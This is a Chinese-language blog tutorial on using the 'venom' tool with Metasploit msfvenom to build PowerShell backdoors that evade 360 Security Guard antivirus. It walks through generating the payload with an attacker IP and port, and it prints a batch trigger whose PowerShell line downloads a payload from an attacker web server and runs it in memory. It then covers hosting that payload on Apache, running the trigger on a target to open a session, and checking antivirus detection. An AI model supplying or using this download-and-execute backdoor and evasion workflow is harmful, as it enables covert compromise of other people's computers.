• venom结合Metasploit绕过360安全卫士


     

    原理msfvenom是msfpayload和msfencode的结合体,利用msfvenom生成shellcode,venom生成工具使用了

    一些 Veil-Evasion.py, unicorn.py, powersploit.py 等工具上的技术。但是venom 是基于 bash 编写的,而不是

    基于 Python。相比 veil evasion 在 payload 格式方面,它支持的更多[例如 .msi .hta .vbs .ps1 .dll.php .jar .pdf]而这些 veil evasion 都不支持。

    msfvenom下载地址:https://github.com/pitcoft/venom/

    1.从Github上下载框架,你可以下载到以下格式:
    tar.gz OR zip OR git clone
     
    2.赋予文件可执行权限:
    cd venom-main
    sudo chmod -R +x *.sh
    sudo chmod -R +x *.py
     
    3.安装依赖关系包:
    cd aux
    sudo ./setup.sh
     
    4.运行
    sudo ./venom.sh

    访问下载路径:https://github.com/pitcoft/venom/ 进行下载

    下载之后会得到一个zip的压缩包,我们用unzip解压即可

     

    1、运行venom.sh之后我们可以看到msfvenom的界面是这样的:

    2、上图这里的模块比较多,有 /apk/exe/php/vbs/bat/ 等格式。在这里我以 11号 模块为例:

    3、在下方输入 11 ,然后按回车键:

    4、接下来会弹出一个窗口,要求你填写攻击者的 IP 、 端口 以及后门名称

     

    5、在接下来我们要填写后门 选择监听模块类型:

     选择完后点击确定

    6、在目录我们可以查看 outoput 输出文件:

    两个文件分别是 pitcoft.ps1trigger.bat

    8、这里选择 msf 的后门模块,选择完后会自动帮你设置相关参数:

    好,我们看到我们的msf已经准备就绪了

    9、下面,我们简单查看下 bat 文件的内容。这里需要我们把 pitcoft.ps1 文件,放到 web 服务器上。 让 powershell去远程下载木马文件:

    1 :: powershell template | Author: r00t-3xp10it
    2 :: Matthew Graeber - DownloadString
    3 :: Download/execute payload in RAM
    4 :: ---
    5 [url=home.php?mod=space&uid=46675]@echo[/url] off
    6 echo [*] Please wait, preparing software ...
    7 powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.105/pitcoft.ps1')

    10、开启 kali 下的 apache 服务:

    1 service apache2 start

    11、将 pitcoft.ps1丢到 /var/www/ 目录下,以便让木马文件访问攻击者 web 地址:

    12、我们只需要 trigger.bat 文件,到目标系统运行一次即可:

    可以看到已经成功建立会话了。

     最后我们来看一下我们的免杀问题

    360安全卫士检测如下:

    VirSCAN.org-多引擎在线扫描结果:

     

  • 相关阅读:
    理解闭包
    .net 应用程序执行过程
    Lambda 表达式
    栈的应用
    C# string
    自包含 与 自描述
    C# 值类型 与 引用类型
    C# 装箱 与 拆箱
    sql server分页的两种方法比较
    九月天开博日志
  • 原文地址:https://www.cnblogs.com/Pitcoft/p/6309539.html
Copyright © 2020-2023  润新知